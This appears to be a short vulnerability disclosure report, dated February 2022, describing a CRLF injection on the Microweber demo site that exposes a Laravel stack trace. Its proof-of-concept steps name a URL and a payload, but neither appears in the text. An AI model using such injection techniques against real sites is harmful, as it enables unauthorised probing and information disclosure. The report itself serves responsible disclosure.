CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in microweber/microweber
Feb 17th 2022
The Introduction of a New Line Character lets the attacker the stack trace at demo.microweber.org/ This Attack becomes more significant because of its Less complication.
The Stack trace discloses following information :
- Backend Response code.
- The Versions of Backend Laravel technology.
- The Routing Path
Proof of Concept
- Visit the following URL :
- Now Add the CRLF payload to the parameter. It will look like this :
This vulnerability is capable of disclosing sensitive stack trace exposed by the back-end which will let the attacker escalate his/her attack vector.
I Hope you understand this issue and Fix it as soon as possible. Thank you.